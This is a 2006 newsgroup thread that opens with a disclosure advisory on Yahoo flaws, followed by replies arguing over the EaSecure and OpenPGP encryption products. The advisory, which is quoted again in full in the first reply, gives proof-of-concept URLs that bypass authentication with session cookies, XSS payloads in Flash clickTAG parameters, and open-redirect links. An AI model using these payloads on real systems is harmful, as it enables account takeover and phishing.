Yahoo Multiple Vulnerabilities ( Authentication Bypass, Session Binding, Cookie Encoding Security We
Yahoo Multiple Vulnerabilities ( Authentication Bypass, Session Binding, Cookie Encoding Security We
am 21.06.2006 19:51:52 von rajesh.sethumadhava
Yahoo Multiple vulnerabilities (Authentication Bypass, Session Binding,
Cookie Encoding Security Weakness, Cross-Site Scripting and URL
Redirection)
############################################################ ################
#
# XDisclose Advisory : XD100001
# Advisory Released : 20th June 06
# Credit : Rajesh Sethumadhavan
#
# Class : Authentication Bypass
# Session Binding Vulnerability
# Cookies Encoding Security Weakness
# Cross-Site Scripting
# URL redirection
# Severity : Medium
# Solution Status : Unpatched
# Vendor : Yahoo
# Affected applications : Yahoo multiple web-based services
#
############################################################ ################
Overview:
Yahoo! Inc. is an American computer services company with a mission to
"be
the most essential global Internet service for consumers and
businesses". It
operates an Internet portal, including the popular Yahoo!
Mail.According to
Web trends Yahoo! is the most visited website on the Internet today
with more
than 400 million unique users. The global network of Yahoo! websites
received
3.4 billion page views per day on average as of October 2005.
Various Yahoo! services are vulnerable to authentication bypass,
session
binding, weak cookie encoding, cross-site scripting file inclusion and
url
redirection vulnerabilities, which is caused due to improper validation
of
user-supplied inputs.
Description:
Multiple vulnerabilities exist in various Yahoo services.
1. Authentication Bypass and Session Binding Vulnerability.
A malicious user can log on to the yahoo without submitting the
username
and password by constructing a malicious URL using cookies.
Same session (URL) can be used to login multiple times from multiple
IP
address leading to session binding vulnerability.
POC: (UPDATED)
------------------------------------------------------------ --------------
http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n =0kvgvgv3qlf11
%26l=i42.j4ij/o&.t=T=sk=DAAsN0czPhbeiv%26d=c2wBTlRVMUFUSTFNV El4TXpnNU5EVS0
BYQFRQUUBdGlwAVNQZHhvQgF6egFnblhtRUJnV0E--&.done=http%3a//ma il.yahoo.com
------------------------------------------------------------ --------------
http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n =0kvgvgv3qlf11
%26l=i42.j4ij/o%26p=m2gvvind13000700&.t=T=sk=DAAsN0czPhbeiv% 26d=c2wBTlRVMU
FUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFnblhtRUJnV0 E-&.done=http
%3a//mail.yahoo.com
------------------------------------------------------------ --------------
Where in "sk" & "d" is session
Screenshot:
http://www.xdisclose.bravehost.com/Images/Yahoo! Auth Bypass.png
2. Cookie Encoding Security Weakness
Implementation of cookies in yahoo is too weak that it can be
decoded
easily. A malicious attacker can easily collect many personal
information
using cookies like year of birth, zipcode, country and name which
can be
used to get password from "yahoo forgot password".
Where in
sk & d is session
n is password
l is username
p is country, year of birth, gender and more
b is cookies created
lg is language
intl is international language
iz is zipcode
jb is Industry and title
POC Screenshot:
http://www.xdisclose.bravehost.com/Images/Yahoo Cookie Encoding.png
3. Cross-Site Scripting.
This vulnerability is resulted from the failure of Yahoo! filtering
engine
to block cretin user-supplied inputs
a) Yahoo Calendar Service XSS
The flaws are due to improper sanitization of inputs passed to
"Location", "Address", "Street" and "Phone".
============================================================ ============
This event repeats every day.
Event Location:
Street:
City, State, Zip:
Phone:
============================================================ ============
Screenshot:
http://www.xdisclose.bravehost.com/Images/XSS Calendar location.png
http://www.xdisclose.bravehost.com/Images/XSS Calendar Address.png
http://www.xdisclose.bravehost.com/Images/XSS Calendar Street.png
http://www.xdisclose.bravehost.com/Images/XSS Calendar Phone.png
b) Yahoo Options Mail Account XSS
The flaws are due to improper sanitization of inputs passed to "Name"
and "Reply to" parameters.
============================================================ ============
Name: |
|
Email: |
sec.test@yahoo.com |
Reply-To: |
@yah.com |
============================================================ ============
Screenshot:
http://www.xdisclose.bravehost.com/Images/XSS Mail Account Reply.png
http://www.xdisclose.bravehost.com/Images/XSS Mail Account Name.png
c) Yahoo Options Filter XSS.
The flaws are due to improper sanitization of inputs passed to "From"
and "To" parameters
============================================================ ============
From contains
"@yahoo.com"
To/CC contains
"@yahoo.com"
============================================================ ============
Screenshot:
http://www.xdisclose.bravehost.com/Images/Xss Filter From.png
http://www.xdisclose.bravehost.com/Images/Xss Filter To.png
d) Yahoo Ads flash file XSS.
The flaws are due to improper sanitization of inputs passed to flash
Ads
files
Exploit:
------------------------------------------------------------ -----------
http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
20060330_68006_asker1_sound.swf?clickTAG=javascript:alert('X SS%20
Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
20060330_68006_1_425x600_monster_morph_asker_1_check.swf?cli ckTAG=
javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20 By%20
Rajesh')
http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
042406_68946_v1_728x90_super_nup_fun.swf?clickTAG=javascript :alert('XSS
%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
042406_68946_v1_425x600_mon_nup_mplace.swf?clickTAG=javascri pt:alert
('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
http://ad.ie.doubleclick.net/812666/specsavers_2for1euro_300 x250.swf?
clickTAG=javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ad s%20\n%20
By%20Rajesh')
http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
042406_68946_v1_728x90_super_nup_sit.swf?clickTAG=javascript :alert
('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_messenger/
20051028_61760_2_425x600_mon_scarehim.swf?clickTAG=javascrip t:alert
('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_mail/
20060512_65459_1_360x100_mwa1_mail_accolades.swf?clickTAG=ja vascript:
alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh ')
and more
------------------------------------------------------------ -----------
Screenshot:
http://www.xdisclose.bravehost.com/Images/XSS Flash Ads.png
e) Yahoo Mail Beta HTTP Header XSS
The flaws are due to improper sanitization of inputs passed to all
HTTP
header like Accept, Accept-Charset, Accept-Language, Cache-Control,
Connection, Content-Length, Content-Type, Cookie, Keep-Alive, Pragma,
SOAPAction and User-Agent in Yahoo Mail Beta.
POC :
============================================================ ============
GET :
http://uk.f555.mail.yahoo.com/ymws?m=ListFolders&wssid=CKyO7 /zcUU2
Host: uk.f555.mail.yahoo.com
User-Agent:
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0 .9,
text/plain;q=0.8,image/png,*/*;q=0.5;
Accept-Language:
en-us,en;q=0.5;
Accept-Encoding:
gzip,deflate;
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;
Keep-Alive: 300;
Connection: keep-alive;
SOAPAction: urn:yahoo:ymws#ListFolders;
Content-Length:
Content-Type: application/xml;
Cookie: B=dcnl4j129c7tu&b=3&s=j3;
F=a=aNqy1CosvW3BmaGno6BSLOpXkP2PCglCZ3_LDJtts8oaitnkGkgOOjxw PKS6&b=bIpq;
Y=v=1&n=0kvgvgv3qlf11&l=i42.j4ij/o&p=m2gvvind12000700&jb=19| 24|&iz=123456
r=g4&lg=uk&intl=uk&np=1;PH=fn=eIhKKoq4dTG7Gjr4FtHqCTA-;
T=z=W/hlEBWF3lEBrRcLnJGLZKoMjIyBjUyNjU2NE9OMzI-&a=QAE&sk=DAA Z7oQuYalSuV&
d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6eg FXL2hsRUJnV0
E-;
U=mt=7lM5FJ2MhYo0WJ.pqDZdpFIY1pCQZRq2Q6ftdw--&ux=W/hlEB&un=0 kvgvgv3qlf11;
YM.dpref1=sec.test%3Aspp%257C1;
Pragma: no-cache;
Cache-Control: no-cache;
============================================================ ============
Screenshot:
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta
Accept-Charset.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta
Accept-Language.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta
Cache-Control.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Connection.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta
Content-Length.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta
Content-Type.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Cookie.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Keep-Alive.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Pragma.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta SoapAction.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta User-Agent.png
Impact:
Successful exploitation allows execution of arbitrary script code
in a users browser session in context of an affected site which may
allow to steal cookie based authentication credentials.
3. URL redirection.
This is due failure of filtering of incoming untrusted data before
the
content reaches their users .This can be exploited for phishing
attack. The
vulnerable parameters are yahoo search web, image, video,
preferences, cache,
yahoo answers and more urls containing /*http://yahoo.com or
/**http://
yahoo.com
Exploit:
------------------------------------------------------------ ---------------
http://rds.yahoo.com/_ylt=Ah0geusyaM2xEzqMAjS9XNyoA/SIG=11do 5qdq6/EXP=
1148028186/**http%3a//www.xdisclose.com
http://search.yahoo.com/preferences/preferences?pref_done=
http%3a//www.xdisclose.com
------------------------------------------------------------ ---------------
Screenshot:
http://www.xdisclose.bravehost.com/Images/URL Redirection
WebSearch.png
http://www.xdisclose.bravehost.com/Images/URL Redirection Images.png
http://www.xdisclose.bravehost.com/Images/URL Redirection Video.png
4) Interesting facts about Yahoo
Yahoo Mail Inbox shows wrong unread messages count if it is above
65535
unread messages.
Screenshot:
http://www.xdisclose.bravehost.com/Images/Yahoo Inbox.png
Original Advisory:
http://www.xdisclose.com/XD100001.txt
Credits:
Rajesh Sethumadhavan has been credited with the discovery of this
vulnerability
Disclaimer:
This entire document is strictly for educational, testing and
demonstrating
purpose only. Modification use and/or publishing this information is
entirely on
your own risk. The exploit code is to be used on your own email
account. I am
not liable for any direct or indirect damages caused as a result of
using the
information or demonstrations provided in any part of this advisory.
Re: Yahoo Multiple Vulnerabilities ( Authentication Bypass, Session Binding, Cookie Encoding Securit
am 22.06.2006 22:35:18 von privacy concerned
rajesh.sethumadhava@gmail.com wrote:
> Yahoo Multiple vulnerabilities (Authentication Bypass, Session Binding,
> Cookie Encoding Security Weakness, Cross-Site Scripting and URL
> Redirection)
>
> ############################################################ ################
> #
> # XDisclose Advisory : XD100001
> # Advisory Released : 20th June 06
> # Credit : Rajesh Sethumadhavan
> #
> # Class : Authentication Bypass
> # Session Binding Vulnerability
> # Cookies Encoding Security Weakness
> # Cross-Site Scripting
> # URL redirection
> # Severity : Medium
> # Solution Status : Unpatched
> # Vendor : Yahoo
> # Affected applications : Yahoo multiple web-based services
> #
> ############################################################ ################
>
>
> Overview:
> Yahoo! Inc. is an American computer services company with a mission to
> "be
> the most essential global Internet service for consumers and
> businesses". It
> operates an Internet portal, including the popular Yahoo!
> Mail.According to
> Web trends Yahoo! is the most visited website on the Internet today
> with more
> than 400 million unique users. The global network of Yahoo! websites
> received
> 3.4 billion page views per day on average as of October 2005.
>
> Various Yahoo! services are vulnerable to authentication bypass,
> session
> binding, weak cookie encoding, cross-site scripting file inclusion and
> url
> redirection vulnerabilities, which is caused due to improper validation
> of
> user-supplied inputs.
>
> Description:
> Multiple vulnerabilities exist in various Yahoo services.
>
>
> 1. Authentication Bypass and Session Binding Vulnerability.
> A malicious user can log on to the yahoo without submitting the
> username
> and password by constructing a malicious URL using cookies.
>
> Same session (URL) can be used to login multiple times from multiple
> IP
> address leading to session binding vulnerability.
>
> POC: (UPDATED)
>
>
> ------------------------------------------------------------ --------------
>
> http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n =0kvgvgv3qlf11
>
> %26l=i42.j4ij/o&.t=T=sk=DAAsN0czPhbeiv%26d=c2wBTlRVMUFUSTFNV El4TXpnNU5EVS0
>
> BYQFRQUUBdGlwAVNQZHhvQgF6egFnblhtRUJnV0E--&.done=http%3a//ma il.yahoo.com
>
> ------------------------------------------------------------ --------------
>
> http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n =0kvgvgv3qlf11
>
> %26l=i42.j4ij/o%26p=m2gvvind13000700&.t=T=sk=DAAsN0czPhbeiv% 26d=c2wBTlRVMU
>
> FUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFnblhtRUJnV0 E-&.done=http
> %3a//mail.yahoo.com
>
> ------------------------------------------------------------ --------------
>
> Where in "sk" & "d" is session
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/Yahoo! Auth Bypass.png
>
>
>
> 2. Cookie Encoding Security Weakness
> Implementation of cookies in yahoo is too weak that it can be
> decoded
> easily. A malicious attacker can easily collect many personal
> information
> using cookies like year of birth, zipcode, country and name which
> can be
> used to get password from "yahoo forgot password".
>
> Where in
> sk & d is session
> n is password
> l is username
> p is country, year of birth, gender and more
> b is cookies created
> lg is language
> intl is international language
> iz is zipcode
> jb is Industry and title
>
> POC Screenshot:
> http://www.xdisclose.bravehost.com/Images/Yahoo Cookie Encoding.png
>
> 3. Cross-Site Scripting.
> This vulnerability is resulted from the failure of Yahoo! filtering
> engine
> to block cretin user-supplied inputs
>
> a) Yahoo Calendar Service XSS
> The flaws are due to improper sanitization of inputs passed to
> "Location", "Address", "Street" and "Phone".
>
> ============================================================ ============
> This event repeats every day.
>
>
> Event Location:
>
Street:
>
City, State, Zip:
>
Phone:
>
> ============================================================ ============
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/XSS Calendar location.png
> http://www.xdisclose.bravehost.com/Images/XSS Calendar Address.png
> http://www.xdisclose.bravehost.com/Images/XSS Calendar Street.png
> http://www.xdisclose.bravehost.com/Images/XSS Calendar Phone.png
>
>
> b) Yahoo Options Mail Account XSS
> The flaws are due to improper sanitization of inputs passed to "Name"
> and "Reply to" parameters.
>
>
> ============================================================ ============
>
> Name: |
> |
>
>
>
> Email: |
> sec.test@yahoo.com |
>
>
> Reply-To: |
> @yah.com |
>
> ============================================================ ============
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/XSS Mail Account Reply.png
> http://www.xdisclose.bravehost.com/Images/XSS Mail Account Name.png
>
>
> c) Yahoo Options Filter XSS.
> The flaws are due to improper sanitization of inputs passed to "From"
> and "To" parameters
>
> ============================================================ ============
> From contains
> "@yahoo.com"
>
> To/CC contains
> "@yahoo.com"
>
> ============================================================ ============
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/Xss Filter From.png
> http://www.xdisclose.bravehost.com/Images/Xss Filter To.png
>
>
> d) Yahoo Ads flash file XSS.
> The flaws are due to improper sanitization of inputs passed to flash
> Ads
> files
>
> Exploit:
> ------------------------------------------------------------ -----------
> http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
> 20060330_68006_asker1_sound.swf?clickTAG=javascript:alert('X SS%20
> Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
> 20060330_68006_1_425x600_monster_morph_asker_1_check.swf?cli ckTAG=
> javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20 By%20
> Rajesh')
>
> http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
> 042406_68946_v1_728x90_super_nup_fun.swf?clickTAG=javascript :alert('XSS
> %20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
> 042406_68946_v1_425x600_mon_nup_mplace.swf?clickTAG=javascri pt:alert
> ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> http://ad.ie.doubleclick.net/812666/specsavers_2for1euro_300 x250.swf?
> clickTAG=javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ad s%20\n%20
> By%20Rajesh')
>
> http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
> 042406_68946_v1_728x90_super_nup_sit.swf?clickTAG=javascript :alert
> ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_messenger/
> 20051028_61760_2_425x600_mon_scarehim.swf?clickTAG=javascrip t:alert
> ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
> http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_mail/
> 20060512_65459_1_360x100_mwa1_mail_accolades.swf?clickTAG=ja vascript:
> alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh ')
>
> and more
> ------------------------------------------------------------ -----------
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/XSS Flash Ads.png
>
>
> e) Yahoo Mail Beta HTTP Header XSS
> The flaws are due to improper sanitization of inputs passed to all
> HTTP
> header like Accept, Accept-Charset, Accept-Language, Cache-Control,
> Connection, Content-Length, Content-Type, Cookie, Keep-Alive, Pragma,
> SOAPAction and User-Agent in Yahoo Mail Beta.
>
> POC :
> ============================================================ ============
> GET :
> http://uk.f555.mail.yahoo.com/ymws?m=ListFolders&wssid=CKyO7 /zcUU2
>
> Host: uk.f555.mail.yahoo.com
> User-Agent:
> Accept:
> text/xml,application/xml,application/xhtml+xml,text/html;q=0 .9,
> text/plain;q=0.8,image/png,*/*;q=0.5;
> Accept-Language:
> en-us,en;q=0.5;
> Accept-Encoding:
> gzip,deflate;
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;
> Keep-Alive: 300;
> Connection: keep-alive;
> SOAPAction: urn:yahoo:ymws#ListFolders;
> Content-Length:
> Content-Type: application/xml;
> Cookie: B=dcnl4j129c7tu&b=3&s=j3;
> F=a=aNqy1CosvW3BmaGno6BSLOpXkP2PCglCZ3_LDJtts8oaitnkGkgOOjxw PKS6&b=bIpq;
> Y=v=1&n=0kvgvgv3qlf11&l=i42.j4ij/o&p=m2gvvind12000700&jb=19| 24|&iz=123456
> r=g4&lg=uk&intl=uk&np=1;PH=fn=eIhKKoq4dTG7Gjr4FtHqCTA-;
> T=z=W/hlEBWF3lEBrRcLnJGLZKoMjIyBjUyNjU2NE9OMzI-&a=QAE&sk=DAA Z7oQuYalSuV&
> d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6eg FXL2hsRUJnV0
> E-;
> U=mt=7lM5FJ2MhYo0WJ.pqDZdpFIY1pCQZRq2Q6ftdw--&ux=W/hlEB&un=0 kvgvgv3qlf11;
> YM.dpref1=sec.test%3Aspp%257C1;
> Pragma: no-cache;
> Cache-Control: no-cache;
> ============================================================ ============
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Accept-Charset.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Accept-Language.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Cache-Control.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Connection.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Content-Length.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Content-Type.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Cookie.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Keep-Alive.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta Pragma.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta SoapAction.png
> http://www.xdisclose.bravehost.com/Images/XSS MailBeta User-Agent.png
>
>
> Impact:
> Successful exploitation allows execution of arbitrary script code
> in a users browser session in context of an affected site which may
> allow to steal cookie based authentication credentials.
>
> 3. URL redirection.
> This is due failure of filtering of incoming untrusted data before
> the
> content reaches their users .This can be exploited for phishing
> attack. The
> vulnerable parameters are yahoo search web, image, video,
> preferences, cache,
> yahoo answers and more urls containing /*http://yahoo.com or
> /**http://
> yahoo.com
>
> Exploit:
>
> ------------------------------------------------------------ ---------------
>
> http://rds.yahoo.com/_ylt=Ah0geusyaM2xEzqMAjS9XNyoA/SIG=11do 5qdq6/EXP=
> 1148028186/**http%3a//www.xdisclose.com
>
> http://search.yahoo.com/preferences/preferences?pref_done=
> http%3a//www.xdisclose.com
>
> ------------------------------------------------------------ ---------------
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/URL Redirection
> WebSearch.png
> http://www.xdisclose.bravehost.com/Images/URL Redirection Images.png
> http://www.xdisclose.bravehost.com/Images/URL Redirection Video.png
>
> 4) Interesting facts about Yahoo
> Yahoo Mail Inbox shows wrong unread messages count if it is above
> 65535
> unread messages.
>
> Screenshot:
> http://www.xdisclose.bravehost.com/Images/Yahoo Inbox.png
>
> Original Advisory:
> http://www.xdisclose.com/XD100001.txt
>
> Credits:
> Rajesh Sethumadhavan has been credited with the discovery of this
> vulnerability
>
Wow! Should you start encrypting emails in your Yahoo Mail account now?
You can do this easily using EaSecure available at
http://www.easecure.com/ .
Re: Yahoo Multiple Vulnerabilities ( Authentication Bypass, SessionBinding, Cookie Encoding Security
am 22.06.2006 22:52:50 von Sebastian Gottschalk
privacy concerned wrote:
[a big long and totally unnecessary fullquote snipped]
> Wow! Should you start encrypting emails in your Yahoo Mail account now?
No. You should already do so.
> You can do this easily using EaSecure available at
> http://www.easecure.com/ .
But isn't encryption about actual security? And damn, what about the
receiver? He must be able to decrypt it as well. Could just once someone
think of the children??? Oh, I know someone who does:
groups-abuse@google.com
Beside that, once again, you're about the last guy I would trust on
security: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET
CLR 1.0.3705; .NET CLR 1.1.4322)
Re: Yahoo Multiple Vulnerabilities ( Authentication Bypass, Session Binding, Cookie Encoding Securit
am 23.06.2006 01:37:35 von privacy concerned
Sebastian Gottschalk wrote:
> privacy concerned wrote:
>
> [a big long and totally unnecessary fullquote snipped]
>
> > Wow! Should you start encrypting emails in your Yahoo Mail account now?
>
> No. You should already do so.
>
"You" means Yahoo Mail users. Most of Yahoo Mail users do not use
encryption yet.
>
> > You can do this easily using EaSecure available at
> > http://www.easecure.com/ .
>
> But isn't encryption about actual security? And damn, what about the
> receiver? He must be able to decrypt it as well.
>
No problem. The receiver uses the EaSecure standalone client to decrypt
the message. EaSecure message is an ".eas" attachment. You can use the
EaSecure standalone client to open the ".eas" attachment. Most of Yahoo
Mail users do not have an SMTP server. EaSecure provides an SMTP server
for sending EaSecure messages using the steandalone client.
>
> Beside that, once again, you're about the last guy I would trust on
> security: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET
> CLR 1.0.3705; .NET CLR 1.1.4322)
>
You don't have to trust me, but if you are going to use encryption at
all, you need to trust some vendor for providing you the software,
unless you write your own code from scratch.
Re: Yahoo Multiple Vulnerabilities ( Authentication Bypass, SessionBinding, Cookie Encoding Security
am 23.06.2006 02:13:31 von Sebastian Gottschalk
privacy concerned wrote:
> Most of Yahoo Mail users do not use encryption yet.
Many Yahoo Mail users are using the Webmail interface and don't even
know how an RFC-conformant eMail looks like. ;-D
>>> You can do this easily using EaSecure available at
>>> http://www.easecure.com/ .
>> But isn't encryption about actual security? And damn, what about
>> the receiver? He must be able to decrypt it as well.
>>
> No problem. The receiver uses the EaSecure standalone client to
> decrypt the message.
Oh, wonderful, a client from some really untrusted company, just to deal
with their proprietary format.
> Most of Yahoo Mail users do not have an SMTP server. EaSecure
> provides an SMTP server for sending EaSecure messages using the
> steandalone client.
WTF? I guess I don't need to mention that you don't need any special
non-mangling server for OpenPGP-Inline, and only MIME-conformance for
OpenPGP/MIME.
>> Beside that, once again, you're about the last guy I would trust on
>> security: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
>> .NET CLR 1.0.3705; .NET CLR 1.1.4322)
>>
> You don't have to trust me, but if you are going to use encryption at
> all, you need to trust some vendor for providing you the software,
Yes, an EaSecure is no trustworthy vendor.
> unless you write your own code from scratch.
Hm... I've carefully read the source codes of GnuPG and Enigmail before
compiling them on my own. And I have an open, standardized and
well-analyzed format with reliable security. And the freedom to choose
between many clients. And an existing, widely deployed key management
infrastructure.